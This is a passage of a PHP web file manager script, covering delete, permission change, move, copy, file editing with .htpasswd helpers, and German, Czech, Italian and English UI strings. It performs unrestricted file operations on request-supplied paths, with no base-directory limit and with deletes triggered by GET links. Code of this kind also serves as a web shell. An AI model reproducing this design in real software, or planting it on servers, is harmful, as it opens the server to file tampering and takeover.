262.     $delete = relpathtoabspath($_GET['delete'], $_SESSION['dir']);
263.     if (@$_GET['sure'] == 'TRUE') {
264.         if (remove($delete)) {
265.             $notice = buildphrase('&quot;<b>' . htmlentities($delete) . '</b>&quot;', $words['deleted']);
266.         } else {
267.             $error = buildphrase('&quot;<b>' . htmlentities($delete) . '</b>&quot;', $words['notdeleted']);
268.         }
269.     } else {
270.         html_header($words['delete']);
271. ?>
272.     <p>
273.     <table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
274.     <table border="0" cellspacing="1" cellpadding="4">
275.     <tr>
276.         <td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
277.         <td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
278.     </tr>
279.     <tr>
280.         <td colspan="2" bgcolor="#FFFFFF"><?php echo(buildphrase('&quot;<b>' . htmlentities($delete) . '</b>&quot;', $words['suredelete'])); ?></td>
281.     </tr>
282.     <tr>
283.         <td colspan="2" align="center" bgcolor="#EEEEEE">
284.             <a href="<?php echo("$self?" . SID . '&delete=' . urlencode($delete) . '&sure=TRUE'); ?>">[ <?php echo($words['yes']); ?> ]</a>
285.         </td>
286.     </tr>
287.     </table>
288.     </td></tr></table>
289.     </p>
290. <?php
291.         html_footer();
292.         exit;
293.     }
294. }
295.  
296. /* Change permission */
297. if (!empty($_GET['permission'])) {
298.     $permission = relpathtoabspath($_GET['permission'], $_SESSION['dir']);
299.     if ($p = @fileperms($permission)) {
300.         if (!empty($_GET['set'])) {
301.             $p = 0;
302.             if (isset($_GET['ur'])) $p |= 0400; if (isset($_GET['uw'])) $p |= 0200; if (isset($_GET['ux'])) $p |= 0100;
303.             if (isset($_GET['gr'])) $p |= 0040; if (isset($_GET['gw'])) $p |= 0020; if (isset($_GET['gx'])) $p |= 0010;
304.             if (isset($_GET['or'])) $p |= 0004; if (isset($_GET['ow'])) $p |= 0002; if (isset($_GET['ox'])) $p |= 0001;
305.             if (@chmod($_GET['permission'], $p)) {
306.                 $notice = buildphrase(array('&quot<b>' . htmlentities($permission) . '</b>&quot;', '&quot;<b>' . substr(octtostr("0$p"), 1) . '</b>&quot; (<b>' . decoct($p) . '</b>)'), $words['permsset']);
307.             } else {
308.                 $error = buildphrase('&quot;<b>' . htmlentities($permission) . '</b>&quot;', $words['permsnotset']);
309.             }
310.         } else {
311.             html_header($words['permission']);
312. ?>
313.     <form action="<?php echo($self); ?>" method="get">
314.     <input type="hidden" name="id" value="<?php echo(session_id()); ?>">
315.     <table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
316.     <table border="0" cellspacing="1" cellpadding="4">
317.     <tr>
318.         <td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
319.         <td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
320.     </tr>
321.     <tr>
322.         <td bgcolor="#EEEEEE" colspan="2">
323.             <table>
324.             <tr>
325.                 <td><?php echo($words['file']); ?>:</td>
326.                 <td><input type="text" name="permission" value="<?php echo(htmlentities($permission)); ?>" size="<?php echo(textfieldsize($permission)); ?>"></td>
327.                 <td><input type="submit" value="<?php echo($words['change']); ?>"></td>
328.             </tr>
329.             <tr>
330.                 <td valign="top">
331.                     <?php echo($words['permission']); ?>:&nbsp;
332.                     </form><form action="<?php echo($self); ?>" method="get">
333.                     <input type="hidden" name="id" value="<?php echo(session_id()); ?>">
334.                     <input type="hidden" name="permission" value="<?php echo(htmlentities($permission)); ?>">
335.                     <input type="hidden" name="set" value="TRUE">
336.                 </td>
337.                 <td colspan="2">
338.                     <table border="0">
339.                     <tr>
340.                         <td>&nbsp;</td>
341.                         <td><?php echo($words['owner']); ?></td>
342.                         <td><?php echo($words['group']); ?></td>
343.                         <td><?php echo($words['other']); ?></td>
344.                     </tr>
345.                     <tr>
346.                         <td><?php echo($words['read']); ?>:</td>
347.                         <td align="center"><input type="checkbox" name="ur" value="1"<?php if ($p & 00400) echo(' checked'); ?>></td>
348.                         <td align="center"><input type="checkbox" name="gr" value="1"<?php if ($p & 00040) echo(' checked'); ?>></td>
349.                         <td align="center"><input type="checkbox" name="or" value="1"<?php if ($p & 00004) echo(' checked'); ?>></td>
350.                     </tr>
351.                     <tr>
352.                         <td><?php echo($words['write']); ?>:</td>
353.                         <td align="center"><input type="checkbox" name="uw" value="1"<?php if ($p & 00200) echo(' checked'); ?>></td>
354.                         <td align="center"><input type="checkbox" name="gw" value="1"<?php if ($p & 00020) echo(' checked'); ?>></td>
355.                         <td align="center"><input type="checkbox" name="ow" value="1"<?php if ($p & 00002) echo(' checked'); ?>></td>
356.                     </tr>
357.                     <tr>
358.                         <td><?php echo($words['exec']); ?>:</td>
359.                         <td align="center"><input type="checkbox" name="ux" value="1"<?php if ($p & 00100) echo(' checked'); ?>></td>
360.                         <td align="center"><input type="checkbox" name="gx" value="1"<?php if ($p & 00010) echo(' checked'); ?>></td>
361.                         <td align="center"><input type="checkbox" name="ox" value="1"<?php if ($p & 00001) echo(' checked'); ?>></td>
362.                     </tr>
363.                     </table>
364.                 </td>
365.             </tr>
366.             <tr>
367.                 <td>&nbsp;</td>
368.                 <td colspan="2"><input type="submit" value="<?php echo($words['setperms']); ?>"></td>
369.             </tr>
370.             </table>
371.         </td>
372.     </tr>
373.     </table>
374.     </td></tr></table>
375.     </form>
376. <?php
377.             html_footer();
378.             exit;
379.         }
380.     } else {
381.         $error = buildphrase('&quot;<b>' . htmlentities($permission) . '</b>&quot;', $words['permsnotset']);
382.     }
383. }
384.  
385. /* Move file */
386. if (!empty($_GET['move'])) {
387.     $move = relpathtoabspath($_GET['move'], $_SESSION['dir']);
388.     if (!empty($_GET['destination'])) {
389.         $destination = relpathtoabspath($_GET['destination'], dirname($move));
390.         if (@is_dir($destination)) $destination = spath($destination) . basename($move);
391.         if ($move == $destination) {
392.             $error = buildphrase(array('&quot;<b>' . htmlentities($move) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['samefiles']);
393.         } else {
394.             if (is_free($destination) && @rename($move, $destination)) {
395.                 $notice = buildphrase(array('&quot;<b>' . htmlentities($move) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['moved']);
396.             } else {
397.                 $error = buildphrase(array('&quot;<b>' . htmlentities($move) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['notmoved']);
398.             }
399.         }
400.     } else {
401.         html_header($words['move']);
402. ?>
403.     <form action="<?php echo($self); ?>" method="get">
404.     <input type="hidden" name="id" value="<?php echo(session_id()); ?>">
405.     <input type="hidden" name="move" value="<?php echo(htmlentities($move)); ?>">
406.     <table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
407.     <table border="0" cellspacing="1" cellpadding="4">
408.     <tr>
409.         <td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
410.         <td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
411.     </tr>
412.     <tr>
413.         <td colspan="2" bgcolor="#EEEEEE">
414.             <table border="0">
415.             <tr>
416.                 <td><?php echo($words['file']); ?>:&nbsp;</td>
417.                 <td><b><?php echo(htmlentities($move)); ?></b></td>
418.             </tr>
419.             <tr>
420.                 <td><?php echo($words['moveto']); ?>:&nbsp;</td>
421.                 <td><input type="text" name="destination" value="<?php echo(htmlentities(spath(dirname($move)))); ?>" size="<?php echo(textfieldsize($move)); ?>"></td>
422.             </tr>
423.             <tr>
424.                 <td>&nbsp;</td>
425.                 <td><input type="submit" value="<?php echo($words['move']); ?>"></td>
426.             </tr>
427.             </table>
428.         </td>
429.     </tr>
430.     </table>
431.     </td></tr></table>
432.     </form>
433. <?php
434.         html_footer();
435.         exit;
436.     }
437. }
438.  
439. /* Copy file */
440. if (!empty($_GET['cpy'])) {
441.     $copy = relpathtoabspath($_GET['cpy'], $_SESSION['dir']);
442.     if (!empty($_GET['destination'])) {
443.         $destination = relpathtoabspath($_GET['destination'], dirname($copy));
444.           if (@is_dir($destination)) $destination = spath($destination) . basename($copy);
445.         if ($copy == $destination) {
446.             $error = buildphrase(array('&quot;<b>' . htmlentities($copy) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['samefiles']);
447.         } else {
448.             if (is_free($destination) && @copy($copy, $destination)) {
449.                 $notice = buildphrase(array('&quot;<b>' . htmlentities($copy) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['copied']);
450.             } else {
451.                 $error = buildphrase(array('&quot;<b>' . htmlentities($copy) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['notcopied']);
452.             }
453.         }
454.     } else {
455.         html_header($words['copy']);
456. ?>
457.     <form action="<?php echo($self); ?>" method="get">
458.     <input type="hidden" name="id" value="<?php echo(session_id()); ?>">
459.     <input type="hidden" name="cpy" value="<?php echo(htmlentities($copy)); ?>">
460.     <table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
461.     <table border="0" cellspacing="1" cellpadding="4">
462.     <tr>
463.         <td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
464.         <td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
465.     </tr>
466.     <tr>
467.         <td colspan="2" bgcolor="#EEEEEE">
468.             <table border="0">
469.             <tr>
470.                 <td><?php echo($words['file']); ?>:&nbsp;</td>
471.                 <td><b><?php echo(htmlentities($copy)); ?></b></td>
472.             </tr>
473.             <tr>
474.                 <td><?php echo($words['copyto']); ?>:&nbsp;</td>
475.                 <td><input type="text" name="destination" value="<?php echo(htmlentities(spath(dirname($copy)))); ?>" size="<?php echo(textfieldsize($copy)); ?>"></td>
476.             </tr>
477.             <tr>
478.                 <td>&nbsp;</td>
479.                 <td><input type="submit" value="<?php echo($words['copy']); ?>"></td>
480.             </tr>
481.             </table>
482.         </td>
483.     </tr>
484.     </table>
485.     </td></tr></table>
486.     </form>
487. <?php
488.         html_footer();
489.         exit;
490.     }
491. }
492.  
493. /* Save edited file */
494. if (!empty($_POST['edit']) && isset($_POST['save'])) {
495.     $edit = relpathtoabspath($_POST['edit'], $_SESSION['dir']);
496.     if ($f = @fopen($edit, 'w')) {
497.         /* write file without carriage returns */
498.         fwrite($f, str_replace("\r\n", "\n", $_POST['content']));
499.         fclose($f);
500.         $notice = buildphrase('&quot;<b>' . htmlentities($edit) . '</b>&quot;', $words['saved']);
501.     } else {
502.         $error = buildphrase('&quot;<b>' . htmlentities($edit) . '</b>&quot;', $words['notsaved']);
503.     }
504. }
505.  
506. /* Edit file */
507. if (isset($_REQUEST['edit']) && !isset($_POST['save'])) {
508.     $file = relpathtoabspath($_REQUEST['edit'], $_SESSION['dir']);
509.     if (@is_dir($file)) {
510.         /* If the requested file is a directory, show the directory */
511.         $_SESSION['dir'] = $file;
512.         $updatetreeview = TRUE;
513.     } else {
514.         if ($f = @fopen($file, 'r')) {
515.             html_header($words['edit']);
516. ?>
517.     <form action="<?php echo($self); ?>" method="get">
518.     <input type="hidden" name="id" value="<?php echo(session_id()); ?>">
519.     <table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
520.     <table border="0" cellspacing="1" cellpadding="4">
521.     <tr>
522.         <td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
523.         <td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
524.     </tr>
525.     <tr>
526.         <td bgcolor="#EEEEEE" colspan="2">
527.             <table border="0" cellspacing="0" cellpadding="0">
528.             <tr>
529.                 <td><?php echo($words['file']); ?>:&nbsp;</td>
530.                 <td><input type="text" name="edit" value="<?php echo(htmlentities($file)); ?>" size="<?php echo(textfieldsize($file)); ?>">&nbsp;</td>
531.                 <td><input type="submit" value="<?php echo($words['change']); ?>"></td>
532.             </tr>
533.             </table>
534.         </td>
535.     </tr>
536.     </table>
537.     </td></tr></table>
538.     </form>
539.     <form action="<?php echo($self); ?>" method="post" name="f">
540.     <input type="hidden" name="id" value="<?php echo(session_id()); ?>">
541.     <input type="hidden" name="edit" value="<?php echo(htmlentities($file)); ?>">
542.     <table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
543.     <table border="0" cellspacing="1" cellpadding="4">
544.     <tr>
545.         <td bgcolor="#EEEEFF" align="center"><textarea name="content" rows="<?php echo($editrows); ?>" cols="<?php echo($editcols); ?>" wrap="off" style="background: #EEEEFF; border: none;"><?php
546.             if (isset($_POST['content'])) {
547.                 echo(htmlentities($_POST['content']));
548.                 if (isset($_POST['add']) && !empty($_POST['username']) && !empty($_POST['password'])) {
549.                     echo("\n" . htmlentities($_POST['username'] . ':' . crypt($_POST['password'])));
550.                 }
551.             } else {
552.                 echo(htmlentities(fread($f, filesize($file))));
553.             }
554.             fclose($f);
555. ?></textarea></td>
556.     </tr>
557. <?php if (basename($file) == '.htpasswd') { /* specials with .htpasswd */ ?>
558.     <tr>
559.         <td bgcolor="#EEEEEE" align="center">
560.             <table border="0">
561.             <tr>
562.                 <td><?php echo($words['username']); ?>:&nbsp;</td>
563.                 <td><input type="text" name="username" size="15">&nbsp;</td>
564.                 <td><?php echo($words['password']); ?>:&nbsp;</td>
565.                 <td><input type="password" name="password" size="15">&nbsp;</td>
566.                 <td><input type="submit" name="add" value="<?php echo($words['add']); ?>"></td>
567.             </tr>
568.             </table>
569.         </td>
570.     </tr>
571. <?php } if (basename($file) == '.htaccess') { /* specials with .htaccess */ ?>
572.     <tr>
573.         <td bgcolor="#EEEEEE" align="center"><input type="button" value="<?php echo($words['addauth']); ?>" onClick="autheinf()"></td>
574.     </tr>
575. <?php } ?>
576.     <tr>
577.         <td bgcolor="#EEEEEE" align="center">
578.             <input type="button" value="<?php echo($words['reset']); ?>" onClick="document.f.reset()">
579.             <input type="button" value="<?php echo($words['clear']); ?>" onClick="void(document.f.content.value='')">
580.             <input type="submit" name="save" value="<?php echo($words['save']); ?>">
581.         </td>
582.     </tr>
583.     </table>
584.     </td></tr></table>
585.     </form>
586. <?php
587.             html_footer();
588.             exit;
589.         } else {
590.             $error = buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot; ', $words['notopened']);
591.         }
592.     }
593. }
594.  
595. /* Show directory listing (and treeview) */
596. if (!empty($_SESSION['tree'])) {
597.     if (isset($_REQUEST['frame']) && $_REQUEST['frame'] == 'treeview') {
598.         treeview();
599.     } else {
600.         if (isset($_GET['noupdate'])) $updatetreeview = FALSE;
601.         dirlisting(TRUE);
602.     }
603. } else {
604.     dirlisting();
605. }
606.  
607. /* ------------------------------------------------------------------------- */
608.  
609. function strip (&$str) {
610.     $str = stripslashes($str);
611. }
612.  
613. function relpathtoabspath ($file, $dir) {
614.     $dir = spath($dir);
615.     if (substr($file, 0, 1) != '/') $file = $dir . $file;
616.     if (!@is_link($file) && ($r = realpath($file)) != FALSE) $file = $r;
617.     if (@is_dir($file) && !@is_link($file)) $file = spath($file);
618.     return $file;
619. }
620.  
621. function abspathtorelpath ($pos, $target) {
622.     $pos = spath($pos);
623.     $path = '';
624.     while ($pos != $target) {
625.         if ($pos == substr($target, 0, strlen($pos))) {
626.             $path .= substr($target, strlen($pos));
627.             break;
628.         } else {
629.             $path .= '../';
630.             $pos = strrev(strstr(strrev(substr($pos, 0, strlen($pos) - 1)), '/'));
631.         }
632.     }
633.     return $path;
634. }
635.  
636. function is_script ($file) {
637.     return ereg('.php[3-4]?$', $file);
638. }
639.  
640. function spath ($path) {
641.     if (substr($path, strlen($path) - 1, 1) != '/') $path .= '/';
642.     return $path;
643. }
644.  
645. function textfieldsize ($str) {
646.     $size = strlen($str) + 5;
647.     if ($size < 30) $size = 30;
648.     return $size;
649. }
650.  
651. function is_free ($file) {
652.     global $words;
653.     if (@file_exists($file) && empty($_GET['overwrite'])) {
654.         html_header($words['alreadyexists']);
655. ?>
656.     <p>
657.     <table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
658.     <table border="0" cellspacing="1" cellpadding="4">
659.     <tr>
660.         <td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
661.         <td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
662.     </tr>
663.     <tr>
664.         <td colspan="2" bgcolor="#FFFFFF"><?php echo(buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot;', $words['overwrite'])); ?></td>
665.     </tr>
666.     <tr>
667.         <td colspan="2" align="center" bgcolor="#EEEEEE">
668.             <a href="<?php echo("{$_SERVER['REQUEST_URI']}&overwrite=yes"); ?>">[ <?php echo($words['yes']); ?> ]</a>
669.         </td>
670.     </tr>
671.     </table>
672.     </td></tr></table>
673.     </p>
674. <?php
675.         html_footer();
676.         exit;
677.     }
678.     if (!empty($_GET['overwrite'])) {
679.         return remove($file);
680.     }
681.     return TRUE;
682. }
683.  
684. function remove ($file) {
685.     global $updatetreeview;
686.     if (@is_dir($file) && !@is_link($file)) {
687.         $error = FALSE;
688.         if ($p = @opendir($file = spath($file))) {
689.             while (($f = readdir($p)) !== FALSE)
690.                 if ($f != '.' && $f != '..' && !remove($file . $f))
691.                     $error = TRUE;
692.         }
693.         if ($error) $x = FALSE; else $x = @rmdir($file);
694.         $updatetreeview = TRUE;
695.         if ($x && !empty($_SESSION['tree'])) {
696.             $file = spath(dirname($file));
697.             $_SESSION['hassubdirs'][$file] = tree_hassubdirs($file);
698.             tree_plus($_SESSION['tree'], $_SESSION['hassubdirs'], $file, TRUE);
699.         }
700.     } else {
701.         $x = @unlink($file);
702.     }
703.     return $x;
704. }
705.  
706. function getwords ($language) {
707.     switch ($language) {
708.     case 'de':
709.         $words['dir'] = 'Verzeichnis'; $words['file'] = 'Datei';
710.         $words['filename'] = 'Dateiname'; $words['size'] = 'Gr&ouml;&szlig;e'; $words['permission'] = 'Rechte'; $words['functions'] = 'Funktionen';
711.         $words['owner'] = 'Eigner'; $words['group'] = 'Gruppe'; $words['other'] = 'Andere';
712.         $words['create'] = 'erstellen'; $words['copy'] = 'kopieren'; $words['copyto'] = 'kopieren nach'; $words['move'] = 'verschieben'; $words['moveto'] = 'verschieben nach'; $words['delete'] = 'l&ouml;schen'; $words['edit'] = 'editieren';
713.         $words['read'] = 'lesen'; $words['write'] = 'schreiben'; $words['exec'] = 'ausf&uuml;hren'; $words['change'] = 'wechseln'; $words['upload'] = 'hochladen'; $words['configure'] = 'konfigurieren';
714.         $words['yes'] = 'ja'; $words['no'] = 'nein';
715.         $words['back'] = 'zur&uuml;ck'; $words['setperms'] = 'Rechte setzen';
716.         $words['readingerror'] = 'Fehler beim Lesen von 1';
717.         $words['permsset'] = 'Die Rechte von 1 wurden auf 2 gesetzt.'; $words['permsnotset'] = 'Die Rechte von 1 konnten nicht gesetzt werden.';
718.         $words['uploaded'] = '1 wurde nach 2 hochgeladen.'; $words['notuploaded'] = '1 konnte nicht nach 2 hochgeladen werden.';
719.         $words['moved'] = '1 wurde nach 2 verschoben.'; $words['notmoved'] = '1 konnte nicht nach 2 verschoben werden.';
720.         $words['copied'] = '1 wurde nach 2 kopiert.'; $words['notcopied'] = '1 konnte nicht nach 2 kopiert werden.';
721.         $words['created'] = '1 wurde erstellt.'; $words['notcreated'] = '1 konnte nicht erstellt werden.';
722.         $words['deleted'] = '1 wurde gel&ouml;scht.'; $words['notdeleted'] = '1 konnte nicht gel&ouml;scht werden.'; $words['suredelete'] = '1 wirklich l&ouml;schen?';
723.         $words['saved'] = '1 wurde gespeichert.'; $words['notsaved'] = '1 konnte nicht gespeichert werden.';
724.         $words['reset'] = 'zur&uuml;cksetzen'; $words['clear'] = 'verwerfen'; $words['save'] = 'speichern';
725.         $words['cantbeshown'] = '1 kann nicht angezeigt werden.'; $words['sourceof'] = 'Quelltext von 1';
726.         $words['notopened'] = '1 konnte nicht ge&ouml;ffnet werden.';
727.         $words['addauth'] = 'Standard-Authentifizierungseinstellungen hinzuf&uuml;gen';
728.         $words['username'] = 'Benutzername'; $words['password'] = 'Kennwort'; $words['add'] = 'hinzuf&uuml;gen';
729.         $words['treeon'] = 'Baumansicht aktivieren'; $words['treeoff'] = 'Baumansicht deaktivieren';
730.         $words['symlink'] = 'Symbolischer Link'; $words['createsymlink'] = 'Link erstellen'; $words['target'] = 'Ziel';
731.         $words['reltarget'] = 'Relative Pfadangabe des Ziels';
732.         $words['alreadyexists'] = 'Die Datei existiert bereits.';
733.         $words['overwrite'] = 'Soll 1 &uuml;berschrieben werden?';
734.         $words['samefiles'] = '1 und 2 sind identisch.';
735.         break;
736.     case 'cz':
737.         $words['dir'] = 'Adres&#xE1;&#x0159;'; $words['file'] = 'Soubor';
738.         $words['filename'] = 'Jm&#xE9;no souboru'; $words['size'] = 'Velikost'; $words['permission'] = 'Pr&#xE1;va'; $words['functions'] = 'Functions';
739.         $words['owner'] = 'Vlastn&#xED;k'; $words['group'] = 'Skupina'; $words['other'] = 'Ostatn&#xED;';
740.         $words['create'] = 'vytvo&#x0159;it'; $words['copy'] = 'kop&#xED;rovat'; $words['copyto'] = 'kop&#xED;rovat do'; $words['move'] = 'p&#x0159;esunout'; $words['moveto'] = 'p&#x0159;esunout do'; $words['delete'] = 'odstranit'; $words['edit'] = '&#xFA;pravy';
741.         $words['read'] = '&#x010D;ten&#xED;'; $words['write'] = 'z&#xE1;pis'; $words['exec'] = 'spu&#x0161;t&#x011B;n&#xED;'; $words['change'] = 'zm&#x011B;nit'; $words['upload'] = 'nahr&#xE1;t'; $words['configure'] = 'nastaven&#xED;';
742.         $words['yes'] = 'ano'; $words['no'] = 'ne';
743.         $words['back'] = 'zp&#xE1;tky'; $words['setperms'] = 'nastav pr&#xE1;va';
744.         $words['readingerror'] = 'Chyba p&#x0159;i &#x010D;ten&#xED; 1';
745.         $words['permsset'] = 'P&#x0159;&#xED;stupov&#xE1; pr&#xE1;va k 1 byla nastavena na 2.'; $words['permsnotset'] = 'P&#x0159;&#xED;stupov&#xE1; pr&#xE1;va k 1 nelze  nastavit na 2.';
746.         $words['uploaded'] = 'Soubor 1 byl ulo&#x017E;en do adres&#xE1;&#x0159;e 2.'; $words['notuploaded'] = 'Chyba p&#x0159;i ukl&#xE1;d&#xE1;n&#xED; souboru 1 do adres&#xE1;&#x0159;e 2.';
747.         $words['moved'] = 'Soubor 1 byl p&#x0159;esunut do adres&#xE1;&#x0159;e 2.'; $words['notmoved'] = 'Soubor 1 nelze p&#x0159;esunout do adres&#xE1;&#x0159;e 2.';
748.         $words['copied'] = 'Soubor 1 byl zkop&#xED;rov&#xE1;n do adres&#xE1;&#x0159;e 2.'; $words['notcopied'] = 'Soubor 1 nelze zkop&#xED;rovat do adres&#xE1;&#x0159;e 2.';
749.         $words['created'] = '1 byl vytvo&#x0159;en.'; $words['notcreated'] = '1 nelze vytvo&#x0159;it.';
750.         $words['deleted'] = '1 byl vymaz&#xE1;n.'; $words['notdeleted'] = '1 nelze vymazat.'; $words['suredelete'] = 'Skute&#x010D;n&#x011B; smazat 1?';
751.         $words['saved'] = 'Soubor 1 byl ulo&#x017E;en.'; $words['notsaved'] = 'Soubor 1 nelze ulo&#x017E;it.';
752.         $words['reset'] = 'zp&#x011B;t'; $words['clear'] = 'vy&#x010D;istit'; $words['save'] = 'ulo&#x017E;';
753.         $words['cantbeshown'] = "1 can't be shown."; $words['sourceof'] = 'source of 1';
754.         $words['notopened'] = "1 nelze otev&#x0159;&#xED;t";
755.         $words['addauth'] = 'p&#x0159;idat z&#xE1;kladn&#xED;-authentifikaci';
756.         $words['username'] = 'U&#x017E;ivatelsk&#xE9; jm&#xE9;no'; $words['password'] = 'Heslo'; $words['add'] = 'p&#x0159;idat';
757.         $words['treeon'] = 'Zobraz strom adres&#xE1;&#x0159;&#x016F;'; $words['treeoff'] = 'Skryj strom adres&#xE1;&#x0159;&#x016F;';
758.         $words['symlink'] = 'Symbolick&#xFD; odkaz'; $words['createsymlink'] = 'vytvo&#x0159;it odkaz'; $words['target'] = 'C&#xED;l';
759.         $words['reltarget'] = 'Relativni cesta k c&#xED;li';
760.         $words['alreadyexists'] = 'Tento soubor u&#x017E; existuje.';
761.         $words['overwrite'] = 'P&#x0159;epsat 1?';
762.         $words['samefiles'] = '1 a 2 jsou identick&#xE9;l.';
763.         break;
764.     case 'it':
765.         $words['dir'] = 'Directory'; $words['file'] = 'File';
766.         $words['filename'] = 'Nome file'; $words['size'] = 'Dimensioni'; $words['permission'] = 'Permessi'; $words['functions'] = 'Funzioni';
767.         $words['owner'] = 'Proprietario'; $words['group'] = 'Gruppo'; $words['other'] = 'Altro';
768.         $words['create'] = 'crea'; $words['copy'] = 'copia'; $words['copyto'] = 'copia su'; $words['move'] = 'muovi'; $words['moveto'] = 'muove su'; $words['delete'] = 'delete'; $words['edit'] = 'edit';
769.         $words['read'] = 'leggi'; $words['write'] = 'scrivi'; $words['exec'] = 'esegui'; $words['change'] = 'modifica'; $words['upload'] = 'upload'; $words['configure'] = 'configura';
770.         $words['yes'] = 'si'; $words['no'] = 'no';
771.         $words['back'] = 'back'; $words['setperms'] = 'imposta permessi';
772.         $words['readingerror'] = 'Errore durante la lettura di 1';
773.         $words['permsset'] = 'I permessi di 1 sono stati impostati a 2.'; $words['permsnotset'] = 'I permessi di 1 non possono essere impostati.';
774.         $words['uploaded'] = '1 &#1080; stato uploadato su 2.'; $words['notuploaded'] = 'Errore durante l\'upload di 1 su 2.';
775.         $words['moved'] = '1 &#1080; stato spostato su 2.'; $words['notmoved'] = '1 non pu&#1090; essere spostato su 2.';
776.         $words['copied'] = '1 &#1080; stato copiato su 2.'; $words['notcopied'] = '1 non pu&#1090; essere copiato su 2.';
777.         $words['created'] = '1 &#1080; stato creato.'; $words['notcreated'] = 'impossibile creare 1.';
778.         $words['deleted'] = '1 &#1080; stato eliminato.'; $words['notdeleted'] = 'Impossibile eliminare 1.'; $words['suredelete'] = 'Confermi eliminazione di 1?';
779.         $words['saved'] = '1 &#1080; stato salvato.'; $words['notsaved'] = 'Impossibile salvare 1.';
780.         $words['reset'] = 'reimposta'; $words['clear'] = 'pulisci'; $words['save'] = 'salva';
781.         $words['cantbeshown'] = "Impossibile visualizzare 1."; $words['sourceof'] = 'sorgente di 1';
782.         $words['notopened'] = "Impossibile aprire 1";
783.         $words['addauth'] = 'aggiunge autenticazione di base';
784.         $words['username'] = 'Nome Utente'; $words['password'] = 'Password'; $words['add'] = 'add';
785.         $words['treeon'] = 'Abilita vista ad albero'; $words['treeoff'] = 'Disabilita vista ad albero';
786.         $words['symlink'] = 'Link simbolico'; $words['createsymlink'] = 'crea symlink'; $words['target'] = 'Target';
787.         $words['reltarget'] = 'Percorso relativo al target';
788.         $words['alreadyexists'] = 'Questo file esiste gi&#1072;.';
789.         $words['overwrite'] = 'Sovrascrivi 1?';
790.         $words['samefiles'] = '1 e 2 sono identici.';
791.         break;
792.     case 'en':
793.     default:
794.         $words['dir'] = 'Directory'; $words['file'] = 'File';
795.         $words['filename'] = 'Filename'; $words['size'] = 'Size'; $words['permission'] = 'Permission'; $words['functions'] = 'Functions';
796.         $words['owner'] = 'Owner'; $words['group'] = 'Group'; $words['other'] = 'Other';
797.         $words['create'] = 'create'; $words['copy'] = 'copy'; $words['copyto'] = 'copy to'; $words['move'] = 'move'; $words['moveto'] = 'move to'; $words['delete'] = 'delete'; $words['edit'] = 'edit';
798.         $words['read'] = 'read'; $words['write'] = 'write'; $words['exec'] = 'execute'; $words['change'] = 'change'; $words['upload'] = 'upload'; $words['configure'] = 'configure';
799.         $words['yes'] = 'yes'; $words['no'] = 'no';
800.         $words['back'] = 'back'; $words['setperms'] = 'set permission';
801.         $words['readingerror'] = 'Error during read of 1';
802.         $words['permsset'] = 'The permission of 1 were set to 2.'; $words['permsnotset'] = 'The permission of 1 could not be set.';
803.         $words['uploaded'] = '1 has been uploaded to 2.'; $words['notuploaded'] = 'Error during upload of 1 to 2.';
804.         $words['moved'] = '1 has been moved to 2.'; $words['notmoved'] = '1 could not be moved to 2.';
805.         $words['copied'] = '1 has been copied to 2.'; $words['notcopied'] = '1 could not be copied to 2.';
806.         $words['created'] = '1 has been created.'; $words['notcreated'] = '1 could not be created.';
807.         $words['deleted'] = '1 has been deleted.'; $words['notdeleted'] = '1 could not be deleted.'; $words['suredelete'] = 'Really delete 1?';
808.         $words['saved'] = '1 has been saved.'; $words['notsaved'] = '1 could not be saved.';
809.         $words['reset'] = 'reset'; $words['clear'] = 'clear'; $words['save'] = 'save';
810.         $words['cantbeshown'] = "1 can't be shown."; $words['sourceof'] = 'source of 1';
811.         $words['notopened'] = "1 couldn't be opened";
812.         $words['addauth'] = 'add basic-authentification';
813.         $words['username'] = 'Username'; $words['password'] = 'Password'; $words['add'] = 'add';
814.         $words['treeon'] = 'Enable treeview'; $words['treeoff'] = 'Disable treeview';
815.         $words['symlink'] = 'Symbolic link'; $words['createsymlink'] = 'create link'; $words['target'] = 'Target';
816.         $words['reltarget'] = 'Relative path to target';
817.         $words['alreadyexists'] = 'This file already exists.';
818.         $words['overwrite'] = 'Overwrite 1?';
819.         $words['samefiles'] = '1 and 2 are identical.';
820.     }
821.     return $words;
822. }
823.  
824. function getimage ($iid) {
825.     $image = 'GIF89a';
